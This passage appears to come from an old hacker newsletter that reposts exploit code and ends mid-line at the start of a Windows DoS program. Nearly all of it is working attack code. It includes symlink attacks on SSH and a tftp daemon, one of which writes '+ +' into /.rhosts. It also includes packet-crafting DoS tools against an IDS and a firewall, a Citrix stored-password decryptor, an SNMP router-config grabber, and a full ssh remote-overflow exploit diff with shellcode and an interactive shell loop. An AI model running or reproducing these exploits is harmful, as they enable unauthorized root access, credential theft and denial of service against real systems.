~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.hack.co.za/daem0n/ssh/socket-dos.pl #!/usr/bin/perl # # vulnerable: SSH 1.2.27 # # A vulnerability in SSH's creation of the authentication # agent UNIX domain socket allows local users to create a # UNIX domain socket with an arbitrary file name in the # system. # # SSH has the concept of authentication proxying via the # SSH authentication agent. It allows for a basic kind of # Single Sign-On capability. The sshd daemon, ssh and ssh # -agent communicate via a UNIX domain socket normally of # the form '/tmp/ssh-/agent-socket-'. # # SSH follows symbolic links while creating the socket as # root thus allowing any local users with ssh access to # create a socket with an arbitrary filename in the # system. # # Notice that this will not work under all operating # systems. Some operating systems do not follow symbolic # links during bind on UNIX domain sockets. Linux 2.0.x, # Solaris 2.5.1 and IRIX 6.5.2 do not follow symbolic # links during bind(2). Linux 2.1.x does. $pid = $$; $whoami = `whoami`; chop($whoami); mkdir("/tmp/ssh-$whoami", 0700); for ($i = $pid; $i < $pid+50; $i++) { symlink("/etc/nologin", "/tmp/ssh-$whoami/ssh-$i-agent"); } # www.hack.co.za [23 May]# @HWA 234.0 [IND] ascend router remote exploit by loneguard. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.hack.co.za/os/routers/ascend/tftp.sh #!/bin/sh # # tftpserv.sh - Loneguard 07/03/99 # # Buggy tftp server shipped with CascadeView B-STDX 8000/9000 # # The tftpd bundled with CascadeView for Ascend's B-STDX 8000/9000 # network devices creates a log in /tmp called tftpd_xfer_status.log. # # If /tmp/tftpd_xfer_status.log already exists as a symbolic link, # tftpd will follow it and overwrite any data it points to (it runs # as root). It is possible for an attacker to link the log file to a # file like /.rhosts to compromise elevated privileges on the device. # # It should be made clear that since this is a network device # vulnerability, the consequences of compromise could be much greater # to the network the device is on as a whole than if it were a single # regular host. rm /tmp/tftpd_xfer_status.log ln -s /.rhosts /tmp/tftpd_xfer_status.log echo KungFu > crazymonkey ( sleep 1 ; echo put crazymonkey ; sleep 1 ; echo quit ) | tftp 127.1 echo "+ +" > /.rhosts # www.hack.co.za [23 May]# @HWA 235.0 [IND] ascend router remote dos exploit by rfp. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ rfp@wiretrip.net http://www.hack.co.za/os/routers/axent/RFProwl.c /* RFProwl.c - rain forest puppy / wiretrip / rfp@wiretrip.net Kills NetProwler IDS version 3.0 You need libnet installed. It's available from www.packetfactory.net. Acks to route. Only tested on RH 6.x Linux. To compile: gcc RFProwl.c -lnet -o RFProwl Plus, make sure your architecture is defined below: Axent NetProwler 3.0 */ #define LIBNET_LIL_ENDIAN 1 #undef LIBNET_BIG_ENDIAN 1 #include /* it's just much easier to code in the packet frags we want. :) */ char pack1[]="\x45\x00" "\x00\x24\x08\xb9\x00\x03\x3e\x06\x96\xf8\x0a\x09\x65\x0d\x0a\x09" "\x64\x01\x04\x02\x08\x0a\x00\x26\xcd\x35\x00\x00\x00\x00\x01\x02" "\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; char pack2[]="\x45\x00" "\x00\x2c\x08\xbf\x20\x00\x3e\x06\x76\xed\x0a\x09\x65\x0d\x0a\x09" "\x64\x01\x04\x08\x00\x15\xa7\xe4\x00\x48\x00\x00\x00\x00\xa0\x02" "\x7d\x78\x72\x9d\x00\x00\x02\x04\x05\xb4\x00\x00"; int main(int argc, char **argv) { int sock, c; u_long src_ip, dst_ip; printf("RFProwl - rain forest puppy / wiretrip\n"); if(argc<3){ printf("Usage: RFProwl \n"); exit(EXIT_FAILURE);} dst_ip=inet_addr(argv[1]); src_ip=inet_addr(argv[2]); memcpy(pack1+16,&dst_ip,4); memcpy(pack2+16,&dst_ip,4); memcpy(pack1+12,&src_ip,4); memcpy(pack1+12,&src_ip,4); sock = open_raw_sock(IPPROTO_RAW); if (sock == -1){ perror("Socket problems: "); exit(EXIT_FAILURE);} c = write_ip(sock, pack1, 46); if (c < 46) printf("Write_ip #1 choked\n"); c = write_ip(sock, pack2, 46); if (c < 46) printf("Write_ip #2 choked\n"); printf("Packets sent\n"); return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS); } /* www.hack.co.za [23 May]*/ @HWA 236.0 [IND] citrix router local exploit by dug song. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.hack.co.za/os/routers/citrix/icadecrypt.c http://www.monkey.org/%7Edugsong/ /* icadecrypt.c Decrypt stored Citrix ICA passwords (in appsrv.ini). vulnerable Citrix MetaFrame for Unix 1.0 - Sun Solaris 8.0 - Sun Solaris 7.0 Citrix MetaFrame for Windows 2000 1.8 and previous - Microsoft Windows NT 2000 Citrix MetaFrame for Windows NT 4.0 TSE 1.8 and previous - Microsoft Windows NT Terminal Server + Microsoft Windows NT 4.0 Citrix WinFrame for Windows NT 3.5 1.8 - Microsoft Windows NT 3.5.1 Dug Song */ #include #include #include #include #include int hex_decode(char *src, u_char *dst, int outsize) { char *p, *pe; u_char *q, *qe, ch, cl; pe = src + strlen(src); qe = dst + outsize; for (p = src, q = dst; p < pe && q < qe && isxdigit((int)*p); p += 2) { ch = tolower(p[0]); cl = tolower(p[1]); if ((ch >= '0') && (ch <= '9')) ch -= '0'; else if ((ch >= 'a') && (ch <= 'f')) ch -= 'a' - 10; else return (-1); if ((cl >= '0') && (cl <= '9')) cl -= '0'; else if ((cl >= 'a') && (cl <= 'f')) cl -= 'a' - 10; else return (-1); *q++ = (ch << 4) | cl; } return (q - dst); } int ica_decrypt(u_char *pass, int len) { u_short i; u_char *p, key; if (len < 4) return (0); i = ntohs(*(u_short *)pass); if (i != len - 2) return (0); key = pass[2]; p = pass + 3; for (i -= 2; i > 0; i--) p[i] = p[i - 1] ^ p[i] ^ key; p[0] ^= (key | 'C'); i = len - 3; memmove(pass, pass + 3, i); pass[i] = '\0'; return (1); } void usage(void) { fprintf(stderr, "Usage: icadecrypt \n"); exit(1); } int main(int argc, char *argv[]) { FILE *f; u_char line[1024], pass[128]; int len; if (argc != 2 || *argv[1] == '-') usage(); if ((f = fopen(argv[1], "r")) == NULL) { perror("fopen"); exit(1); } while (fgets(line, sizeof(line), f) != NULL) { if (strncmp(line, "Password=", 9) == 0) { len = hex_decode(line + 9, pass, sizeof(pass)); if (ica_decrypt(pass, len)) printf("; icadecrypt: [%s]\n", pass); } printf("%s", line); } fclose(f); exit(0); } /* 5000. */ /* www.hack.co.za [23 May]*/ @HWA 237.0 [IND] ascend router remote dos attack by msg.net. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.hack.co.za/os/routers/axent/raptor.c /* * 10.26.1999 * Axent Raptor 6.0 'IP Options DOS' as documented in BugTraq 10.20.1999 * * Proof of Concept by MSG.Net, Inc. * * Tested on Intel/*BSD systems, your mileage may vary. No warranty. * Free to distribute as long as these comments remain intact. * * Exercises the IP options bug reported in Raptor 6.0, this bug is fixed by * an Axent official patch available at: * * ftp://ftp.raptor.com/patches/V6.0/6.02Patch/ * * * The MSG.Net Firewall Wrecking Crew * * [kadokev, l^3, strange, vn] * * Quid custodiet ipsos custodes? */ #define __FAVOR_BSD #include #include #include #include #include #include #include #include #include #include #define SRC_IP htonl(0x0a000001) /* 10.00.00.01 */ #define TCP_SZ 20 #define IP_SZ 20 #define PAYLOAD_LEN 32 #define OPTSIZE 4 #define LEN (IP_SZ + TCP_SZ + PAYLOAD_LEN + OPTSIZE) void main(int argc, char *argv[]) { int checksum(unsigned short *, int); int raw_socket(void); int write_raw(int, unsigned char *, int); unsigned long option = htonl(0x44000001); /* Timestamp, NOP, END */ unsigned char *p; int s, c; struct ip *ip; struct tcphdr *tcp; if (argc != 2) { printf("Quid custodiet ipsos custodes?\n"); printf("Usage: %s \n", argv[0]); return; } p = malloc(1500); memset(p, 0x00, 1500); if ((s = raw_socket()) < 0) return perror("socket"); ip = (struct ip *) p; ip->ip_v = 0x4; ip->ip_hl = 0x5 + (OPTSIZE / 4); ip->ip_tos = 0x32; ip->ip_len = htons(LEN); ip->ip_id = htons(0xbeef); ip->ip_off = 0x0; ip->ip_ttl = 0xff; ip->ip_p = IPPROTO_TCP; ip->ip_sum = 0; ip->ip_src.s_addr = SRC_IP; ip->ip_dst.s_addr = inet_addr(argv[1]); /* Masquerade the packet as part of a legitimate answer */ tcp = (struct tcphdr *) (p + IP_SZ + OPTSIZE); tcp->th_sport = htons(80); tcp->th_dport = 0xbeef; tcp->th_seq = 0x12345678; tcp->th_ack = 0x87654321; tcp->th_off = 5; tcp->th_flags = TH_ACK | TH_PUSH; tcp->th_win = htons(8192); tcp->th_sum = 0; /* Set the IP options */ memcpy((void *) (p + IP_SZ), (void *) &option, OPTSIZE); c = checksum((unsigned short *) &(ip->ip_src), 8) + checksum((unsigned short *) tcp, TCP_SZ + PAYLOAD_LEN) + ntohs(IPPROTO_TCP + TCP_SZ); while (c >> 16) c = (c & 0xffff) + (c >> 16); tcp->th_sum = ~c; printf("Sending %s -> ", inet_ntoa(ip->ip_src)); printf("%s\n", inet_ntoa(ip->ip_dst)); if (write_raw(s, p, LEN) != LEN) perror("sendto"); } int write_raw(int s, unsigned char *p, int len) { struct ip *ip = (struct ip *) p; struct tcphdr *tcp; struct sockaddr_in sin; tcp = (struct tcphdr *) (ip + ip->ip_hl * 4); memset(&sin, 0x00, sizeof(sin)); sin.sin_family = AF_INET; sin.sin_addr.s_addr = ip->ip_dst.s_addr; sin.sin_port = tcp->th_sport; return (sendto(s, p, len, 0, (struct sockaddr *) &sin, sizeof(struct sockaddr_in))); } int raw_socket(void) { int s, o = 1; if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) return -1; if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, (void *) &o, sizeof(o)) < 0) return (-1); return (s); } int checksum(unsigned short *c, int len) { int sum = 0; int left = len; while (left > 1) { sum += *c++; left -= 2; } if (left) sum += *c & 0xff; return (sum); } /*###EOF####*/ /* www.hack.co.za [24 May]*/ @HWA 238.0 [IND] cisco/ascend router remote exploit. posted by mixter. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.hack.co.za/os/routers/cisco/grabrtrconf.sh #!/bin/sh # grabrtrconf: # Pull router configs via tftp for cisco's and ascends. obviously trivial to # modify this for other network hardware that supports this type of thing. # # - [type] can be one of cisco | ascend currently # - defaults to cisco # - requires cmu snmp utilities (snmpset specifically) # - use TFTPLISTEN and disable tftp from /etc/inetd.conf if you want to # launch a 'temporary' in.tftpd just to grab the file. # - 'pidof' only exists on linux that I know of which kindof makes this a # linux-only tool, unless/until I decide to stop relying on it. # - Set 'INT' to whatever your routable IP is. # - run as root (if you want to launch the tftp server) # # - I know this is lame... but it works (most of the time). # # by: Eric Monti 11/1997 # TFTPLISTEN="true" DIR=/tftpboot #might want to use something else WAIT=6 INT=ppp0 test "$4" = "" && echo "Usage: `basename $0` target write-community tftphost filename [type]" && exit 1 TYPE=$5 test "$5" = "" && TYPE="cisco" IPADDR=$3 test "$IPADDR" = "." && IPADDR=`/sbin/ifconfig $INT | grep inet | sed "s/\:/\ /" | awk '{print $3}'` echo $3 if [ -n $TFTPLISTEN ];then echo "tftp dgram udp wait root /usr/sbin/in.tftpd in.tftpd $DIR" > /tmp/ind.conf /usr/sbin/inetd -d /tmp/ind.conf & rm /tmp/ind.conf rm -f $DIR/$4 touch $DIR/$4 chmod 666 $DIR/$4 fi #CISCO get config test "$TYPE" = "cisco" && \ snmpset -r 3 -t 3 $1 $2 .1.3.6.1.4.1.9.2.1.55.$IPADDR s $4 #ASCEND get config if [ "$TYPE" = "ascend" ];then snmpset -r 3 -t 3 $1 $2 .1.3.6.1.4.1.529.9.5.3.0 a $IPADDR snmpset -r 3 -t 3 $1 $2 .1.3.6.1.4.1.529.9.5.4.0 s $4 snmpset -r 3 $1 $2 .1.3.6.1.4.1.529.9.5.1.0 i 3 snmpset -r 3 $1 $2 .1.3.6.1.4.1.529.9.5.3.0 a "0.0.0.0" snmpset -r 3 $1 $2 .1.3.6.1.4.1.529.9.5.4.0 s "" fi sleep $WAIT # i got lazy and used pidof... so what. # I made pretty dots appear to make up for it! if (test `pidof in.tftpd`);then echo Receiving file: while (test "`pidof in.tftpd`");do echo -n . sleep 1 done echo echo Transfer Complete fi if [ -n $TFTPLISTEN ];then kill `cat /var/run/inetd.pid` # jeepers, i hope that wasnt the real1 fi # www.hack.co.za [23 May]# @HWA 239.0 [IND] remote ssh 1.2.27 remote overflow by Core SDI SA. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.hack.co.za/daem0n/ssh/sshd-rsaref2.diff diff -N -c ssh-1.2.27/README.coresdi ssh-1.2.27-exploit/README.coresdi *** ssh-1.2.27/README.coresdi Wed Dec 31 21:00:00 1969 --- ssh-1.2.27-exploit/README.coresdi Tue Dec 14 19:21:10 1999 *************** *** 0 **** --- 1,32 ---- + /* + * + * Descrition: Exploit code for SSH-1.2.27 sshd with rsaref2 compiled in + * (--with-rsaref) + * + * Author: Alberto Solino + * + * Copyright (c) 1999 CORE SDI S.A., Buenos Aires, Argentina. + * All rights reserved. + * + * + * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES + * ARE DISCLAIMED. IN NO EVENT SHALL CORE SDI S.A. BE LIABLE FOR ANY DIRECT, + * INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR CONSEQUENTIAL DAMAGES RESULTING + * FROM THE USE OR MISUSE OF THIS SOFTWARE. + * + */ + + Tested on + SSH-1.2.27 Linux RedHat 6.0 + SSh-1.2.27 OpenBSD 2.6 + + Details + Relies on offsets taken from JUMP_TO_MY_KEY that are different on + different boxes. + If it doesnt work, check inside incoming.buf for the string "BETO" + and find the proper offsets from there. + Additionally, the -f nad -t options are available, to provide + a range of addresses and try to brute force remotely the right + one. + Specify the target os type with -o + Binary files ssh-1.2.27/exploit_key and ssh-1.2.27-exploit/exploit_key differ diff -N -c ssh-1.2.27/exploit_key.pub ssh-1.2.27-exploit/exploit_key.pub *** ssh-1.2.27/exploit_key.pub Wed Dec 31 21:00:00 1969 --- ssh-1.2.27-exploit/exploit_key.pub Tue Nov 30 01:14:10 1999 *************** *** 0 **** --- 1 ---- + 1024 35 126711790959034717449904354103174105464423905750911738400315407900752946071988773532672356922306687685191424606806952947660867911760697942514594956213990584856991678398353026692681430136274853402829183803383791361598788187120276305630837366787507026341329913385926890796258293060370046555624537870005279144741 root@jack Common subdirectories: ssh-1.2.27/gmp-2.0.2-ssh-2 and ssh-1.2.27-exploit/gmp-2.0.2-ssh-2 diff -N -c ssh-1.2.27/history ssh-1.2.27-exploit/history *** ssh-1.2.27/history Wed Dec 31 21:00:00 1969 --- ssh-1.2.27-exploit/history Tue Nov 16 21:41:36 1999 *************** *** 0 **** --- 1,7 ---- + Tue Nov 16 19:58:04 ART 1999 + En RSAPrivateBlock, no calcula la longitud de salida del buffer, simplemente copia + el tamanio del modulo que esta en privatekey, pero la longitud de los numeros + nunca es mayor que 128. + Tue Nov 16 21:41:15 ART 1999 + overflow en RSAPrivateDecrypt????!?!?!??!?!?! who knows!! fijarse... + Common subdirectories: ssh-1.2.27/rsaref2 and ssh-1.2.27-exploit/rsaref2 diff -N -c ssh-1.2.27/ssh.c ssh-1.2.27-exploit/ssh.c *** ssh-1.2.27/ssh.c Wed May 12 08:19:28 1999 --- ssh-1.2.27-exploit/ssh.c Tue Dec 14 19:03:59 1999 *************** *** 202,208 **** #include "readconf.h" #include "userfile.h" #include "emulate.h" - #ifdef LIBWRAP #include #include --- 202,207 ---- *************** *** 212,217 **** --- 211,249 ---- int allow_severity = LOG_INFO; int deny_severity = LOG_WARNING; #endif /* LIBWRAP */ + #ifdef SSH_EXPLOIT + #define BETO_STR 0x80850f8 + unsigned long exp_offset=BETO_STR; + unsigned long exp_offset_to=BETO_STR; + unsigned char *shell_code; + unsigned long shell_code_len=0; + unsigned char linux_shell_code[]= + {0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 + ,0xeb ,0x44 ,0x5e ,0x89 ,0x76 + ,0x08 ,0x31 ,0xc0 ,0x88 ,0x46 ,0x07 ,0x89 ,0x46 + ,0x0c ,0x56 ,0xb9 ,0x00 ,0x00 ,0x00 ,0x00 ,0xbb + ,0x05 ,0x00 ,0x00 ,0x00 ,0xb0 ,0x3f ,0xcd ,0x80 + ,0xb9 ,0x01 ,0x00 ,0x00 ,0x00 ,0xbb ,0x05 ,0x00 + ,0x00 ,0x00 ,0xb0 ,0x3f ,0xcd ,0x80 ,0xb9 ,0x02 + ,0x00 ,0x00 ,0x00 ,0xbb ,0x05 ,0x00 ,0x00 ,0x00 + ,0xb0 ,0x3f ,0xcd ,0x80 ,0x5e ,0xb0 ,0x0b ,0x89 + ,0xf3 ,0x8d ,0x4e ,0x08 ,0x8d ,0x56 ,0x0c ,0xcd + ,0x80 ,0xe8 ,0xb7 ,0xff ,0xff ,0xff ,0x2f ,0x62 + ,0x69 ,0x6e ,0x2f ,0x73 ,0x68 ,0x00}; + unsigned char bsd_shell_code[]= + {0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0xeb, 0x45, 0x5e, 0x89, 0x76, 0x08, 0x31, 0xc0, + 0x88, 0x46, 0x07, 0x89, 0x46, 0x0c, 0x6a, 0x00, + 0x6a, 0x05, 0x51, 0xb8, 0x5a, 0x00, 0x00, 0x00, + 0xcd, 0x80, 0x6a, 0x01, 0x6a, 0x05, 0x51, 0xb8, + 0x5a, 0x00, 0x00, 0x00, 0xcd, 0x80, 0x6a, 0x02, + 0x6a, 0x05, 0x51, 0xb8, 0x5a, 0x00, 0x00, 0x00, + 0xcd, 0x80, 0x6a, 0x00, 0x8d, 0x46, 0x08, 0x50, + 0x8b, 0x46, 0x08, 0x50, 0xb8, 0x3b, 0x00, 0x00, + 0x00, 0x31, 0xc9, 0x41, 0x51, 0xcd, 0x80, 0xe8, + 0xb6, 0xff, 0xff, 0xff, 0x2f, 0x62, 0x69, 0x6e, + 0x2f, 0x73, 0x68, 0x00}; + #endif /* Random number generator state. This is initialized in ssh_login, and left initialized. This is used both by the packet module and by various *************** *** 275,280 **** --- 307,322 ---- /* Prints a help message to the user. This function never returns. */ void usage(void) { + #ifdef SSH_EXPLOIT + fprintf(stderr, "ssh/rsaref2 exploit by Core SDI SA (c) 1999\n"); + fprintf(stderr, "Usage:\n\t%s [-f offset_from] [-t offset_to] -o ostype host\n",av0); + fprintf(stderr, "where:\n"); + fprintf(stderr, "\toffset_from: start offset for brute force\n"); + fprintf(stderr, "\toffset_to: end offset for brute force\n"); + fprintf(stderr, "\tostype: remote machine ostype\n"); + fprintf(stderr, " BSD : for (*BSD)\n"); + fprintf(stderr, " Linux : for Intel Linuxes\n\n"); + #else fprintf(stderr, "Usage: %s [options] host [command]\n", av0); fprintf(stderr, "Options:\n"); fprintf(stderr, " -l user Log in using this user name.\n"); *************** *** 321,326 **** --- 363,369 ---- fprintf(stderr, " -C Enable compression.\n"); fprintf(stderr, " -g Allow remote hosts to connect to local port forwardings\n"); fprintf(stderr, " -o 'option' Process the option as if it was read from a configuration file.\n"); + #endif exit(1); } *************** *** 504,510 **** --- 547,557 ---- opt = av[optind][1]; if (!opt) usage(); + #ifdef SSH_EXPLOIT + if (strchr("fto", opt)) /* options with arguments */ + #else if (strchr("eilcpLRo", opt)) /* options with arguments */ + #endif { optarg = av[optind] + 2; if (strcmp(optarg, "") == 0) *************** *** 522,527 **** --- 569,594 ---- } switch (opt) { + #ifdef SSH_EXPLOIT + case 'f': + exp_offset = strtoul(optarg,NULL,16); + break; + case 't': + exp_offset_to = strtoul(optarg,NULL,16); + break; + case 'o': + if ( !strcmp(optarg,"BSD") ) { + shell_code = bsd_shell_code; + shell_code_len = sizeof(bsd_shell_code); + } + else if ( !strcmp(optarg,"Linux") ) { + shell_code = linux_shell_code; + shell_code_len = sizeof(linux_shell_code); + } + else + usage(); + break; + #else case 'n': stdin_null_flag = 1; break; *************** *** 681,692 **** case 'g': options.gateway_ports = 1; break; ! default: usage(); } } ! /* Check that we got a host name. */ if (!host) usage(); --- 748,766 ---- case 'g': options.gateway_ports = 1; break; ! #endif default: usage(); } } ! #ifdef SSH_EXPLOIT ! if ( shell_code == NULL ) ! usage(); ! if ( exp_offset_to < exp_offset ) { ! fprintf(stderr,"Invalid offsets!\n"); ! usage(); ! } ! #endif /* Check that we got a host name. */ if (!host) usage(); *************** *** 793,798 **** --- 867,876 ---- rhosts_authentication is true. Note that the random_state is not yet used by this call, although a pointer to it is stored, and thus it need not be initialized. */ + #ifdef SSH_EXPLOIT + do + { + #endif ok = ssh_connect(host, options.port, options.connection_attempts, !use_privileged_port, original_real_uid, options.proxy_command, &random_state); *************** *** 846,857 **** original_real_uid); options.user_hostfile = tilde_expand_filename(options.user_hostfile, original_real_uid); ! /* Log into the remote system. This never returns if the login fails. Note: this initializes the random state, and leaves it initialized. */ ssh_login(&random_state, host_private_key_loaded, &host_private_key, host, &options, original_real_uid); ! /* We no longer need the host private key. Clear it now. */ if (host_private_key_loaded) rsa_clear_private_key(&host_private_key); --- 924,941 ---- original_real_uid); options.user_hostfile = tilde_expand_filename(options.user_hostfile, original_real_uid); ! #ifdef SSH_EXPLOIT ! fprintf(stdout,"Tryin'... 0x%x\n",exp_offset); ! #endif /* Log into the remote system. This never returns if the login fails. Note: this initializes the random state, and leaves it initialized. */ ssh_login(&random_state, host_private_key_loaded, &host_private_key, host, &options, original_real_uid); ! #ifdef SSH_EXPLOIT ! exp_offset++; ! } while (exp_offset<=exp_offset_to); ! fprintf(stderr,"Didn't work ;( \n"); ! #endif /* We no longer need the host private key. Clear it now. */ if (host_private_key_loaded) rsa_clear_private_key(&host_private_key); diff -N -c ssh-1.2.27/sshconnect.c ssh-1.2.27-exploit/sshconnect.c *** ssh-1.2.27/sshconnect.c Wed May 12 08:19:29 1999 --- ssh-1.2.27-exploit/sshconnect.c Thu Dec 9 17:09:39 1999 *************** *** 214,220 **** #include "mpaux.h" #include "userfile.h" #include "emulate.h" - #ifdef KERBEROS #ifdef KRB5 #include --- 214,219 ---- *************** *** 1271,1276 **** --- 1270,1280 ---- const char *orighost, Options *options, uid_t original_real_uid) { + #ifdef SSH_EXPLOIT + extern unsigned long exp_offset; + extern unsigned char *shell_code; + extern unsigned long shell_code_len; + #endif int i, type, len, f; char buf[1024], seedbuf[16]; char *password; *************** *** 1278,1283 **** --- 1282,1298 ---- MP_INT key; RSAPublicKey host_key; RSAPublicKey public_key; + #ifdef SSH_EXPLOIT + MP_INT fakekey; + int retval; + unsigned char first; + struct sockaddr_in sin; + int sin_len=sizeof(struct sockaddr_in); + RSAPrivateKey myfakeKey; + RSAPrivateKey myPrivateKey; + char private_key_filename[]="exploit_key"; + fd_set rfds; + #endif unsigned char session_key[SSH_SESSION_KEY_LENGTH]; const char *server_user, *local_user; char *cp, *host; *************** *** 1501,1506 **** --- 1516,1522 ---- /* Generate an encryption key for the session. The key is a 256 bit random number, interpreted as a 32-byte key, with the least significant 8 bits being the first byte of the key. */ + for (i = 0; i < SSH_SESSION_KEY_LENGTH; i++) session_key[i] = random_get_byte(state); *************** *** 1519,1532 **** else mpz_add_ui(&key, &key, session_key[i]); } ! /* Encrypt the integer using the public key and host key of the server (key with smaller modulus first). */ if (mpz_cmp(&public_key.n, &host_key.n) < 0) { /* Public key has smaller modulus. */ assert(host_key.bits >= public_key.bits + SSH_KEY_BITS_RESERVED); - rsa_public_encrypt(&key, &key, &public_key, state); rsa_public_encrypt(&key, &key, &host_key, state); } --- 1535,1552 ---- else mpz_add_ui(&key, &key, session_key[i]); } ! #ifdef SSH_EXPLOIT ! if ( load_private_key(getuid(),private_key_filename,"",&myPrivateKey,NULL)==0) { ! fprintf(stderr,"Cannot locate private key %s\n",private_key_filename); ! exit(1); ! } ! #endif /* Encrypt the integer using the public key and host key of the server (key with smaller modulus first). */ if (mpz_cmp(&public_key.n, &host_key.n) < 0) { /* Public key has smaller modulus. */ assert(host_key.bits >= public_key.bits + SSH_KEY_BITS_RESERVED); rsa_public_encrypt(&key, &key, &public_key, state); rsa_public_encrypt(&key, &key, &host_key, state); } *************** *** 1534,1540 **** { /* Host key has smaller modulus (or they are equal). */ assert(public_key.bits >= host_key.bits + SSH_KEY_BITS_RESERVED); - rsa_public_encrypt(&key, &key, &host_key, state); rsa_public_encrypt(&key, &key, &public_key, state); } --- 1554,1559 ---- *************** *** 1564,1569 **** --- 1583,1637 ---- for (i = 0; i < 8; i++) packet_put_char(check_bytes[i]); + #ifdef SSH_EXPLOIT + for ( i = 0 ; i < 16; i++ ) { + mpz_mul_2exp(&key, &key, 8); + mpz_add_ui(&key, &key, i+1); + } + /* Aca seto el lugar donde va a estar la clave nueva cambiada*/ + for ( i = 0; i < 4 ; i++ ) { + mpz_mul_2exp(&key,&key,8); + mpz_add_ui(&key,&key, ((exp_offset+9) >> (i*8) & 0xff)); + } + + /* Con esto fuerzo a que el ciphertext sea mas chico que el modulo*/ + key._mp_d[31]=0; + key._mp_d[32]=0; + key._mp_d[3]=htonl(exp_offset+0x5b); + /* Ret address a mi codigo */ + //key._mp_d[3]=0x51510808; // JUMP_TO_MY_KEY+87 dado vuelta + /* + No se porque mierda ahora hay que invertilo... + key._mp_d[3]=JUMP_TO_MY_KEY+80; + */ + + myfakeKey.bits = 1182; /* Tamanio de la clave */ + myfakeKey.n._mp_alloc = 33; + myfakeKey.n._mp_size = 32; + myfakeKey.n._mp_d = (unsigned long int *)(exp_offset+184); + + myfakeKey.e._mp_alloc = 1; + myfakeKey.e._mp_size = 1; + myfakeKey.e._mp_d = (unsigned long int *)(exp_offset+316); + + myfakeKey.d._mp_alloc = 1; + myfakeKey.d._mp_size = 1; + myfakeKey.d._mp_d = (unsigned long int *)(exp_offset+25); + + myfakeKey.u._mp_alloc = 17; + myfakeKey.u._mp_size = 16; + myfakeKey.u._mp_d = (unsigned long int *)(exp_offset+460); + + myfakeKey.p._mp_alloc = 17; + myfakeKey.p._mp_size = 16; + myfakeKey.p._mp_d = (unsigned long int *)(exp_offset+392); + + myfakeKey.q._mp_alloc = 17; + myfakeKey.q._mp_size = 16; + myfakeKey.q._mp_d = (unsigned long int *)(exp_offset+324); + + #endif + /* Send the encrypted encryption key. */ packet_put_mp_int(&key); *************** *** 1571,1579 **** --- 1639,1686 ---- packet_put_int(SSH_PROTOFLAG_SCREEN_NUMBER | SSH_PROTOFLAG_HOST_IN_FWD_OPEN); /* Send the packet now. */ + #ifdef SSH_EXPLOIT + packet_put_string("BETO",4); + packet_put_string((char *)&myfakeKey,sizeof(myfakeKey)); + packet_put_string(shell_code, shell_code_len); + packet_put_string((char *)myPrivateKey.n._mp_d,myPrivateKey.n._mp_size*4); + packet_put_string((char *)myPrivateKey.e._mp_d,myPrivateKey.e._mp_size*4); + packet_put_string((char *)myPrivateKey.q._mp_d,myPrivateKey.q._mp_size*4); + packet_put_string((char *)myPrivateKey.p._mp_d,myPrivateKey.p._mp_size*4); + packet_put_string((char *)myPrivateKey.u._mp_d,myPrivateKey.u._mp_size*4); + #endif packet_send(); packet_write_wait(); + #ifdef SSH_EXPLOIT + usleep(10); + first = 1; + i = write(packet_get_connection_in(),"id\n",3); + if ( getpeername(packet_get_connection_in(),(struct sockaddr *)&sin, &sin_len) == -1) + return; + + while (1) { + FD_ZERO(&rfds); + FD_SET(packet_get_connection_in(),&rfds); + FD_SET(STDIN_FILENO,&rfds); + if ( (retval = select(packet_get_connection_in()+1,&rfds,NULL,NULL,NULL)) < 0 ) + return; + if (FD_ISSET(STDIN_FILENO,&rfds)) { + i=read(STDIN_FILENO,buf,sizeof(buf)); + write(packet_get_connection_out(),buf,i); + } else if (FD_ISSET(packet_get_connection_in(),&rfds)) { + i=read(packet_get_connection_in(),buf,sizeof(buf)); + if ( first ) + if ( strncmp(buf,"uid",3) ) + return; + else { + fprintf(stdout,"Got it!\n"); + first = 0; + } + write(STDOUT_FILENO,buf,i); + } + } + #endif /* Destroy the session key integer and the public keys since we no longer need them. */ mpz_clear(&key); *************** *** 1583,1588 **** --- 1690,1697 ---- debug("Sent encrypted session key."); /* Set the encryption key. */ + packet_set_encryption_key(session_key, SSH_SESSION_KEY_LENGTH+120, + options->cipher, 1); packet_set_encryption_key(session_key, SSH_SESSION_KEY_LENGTH, options->cipher, 1); Common subdirectories: ssh-1.2.27/zlib-1.0.4 and ssh-1.2.27-exploit/zlib-1.0.4 @HWA 240.0 [IND] '0-day' jolt2.c poc code ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ WinSec mailing list -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Here is some proof of concept code for the Jolt2 DoS reported by BindView Razor Team (http://razor.bindview.com). Note, this code was not created by me, I am simply passing it on to the mailing list. Send all questions/problems to the author of the code, phonix@moocow.org Regards; Steve Manzuik Moderator - --------------snip---------------- /* * File: jolt2.c * Author: Phonix * Date: 23-May-00 * * Description: This is the proof-of-concept code for the * Windows denial-of-serice attack described by * the Razor team (NTBugtraq, 19-May-00) * (MS00-029). This code causes cpu utilization * to go to 100%. * * Tested against: Win98; NT4/SP5,6; Win2K * * Written for: My Linux box. YMMV. Deal with it. * * Thanks: This is standard code. Ripped from lots of places. * Insert your name here if you think you wrote some of * it. It's a trivial exploit, so I won't take credit * for anything except putting this file together. */ #include #include #include #include #include #include #include #include #include #include #include struct _pkt { struct iphdr ip; union { struct icmphdr icmp; struct udphdr udp; } proto; char data; } pkt; int icmplen 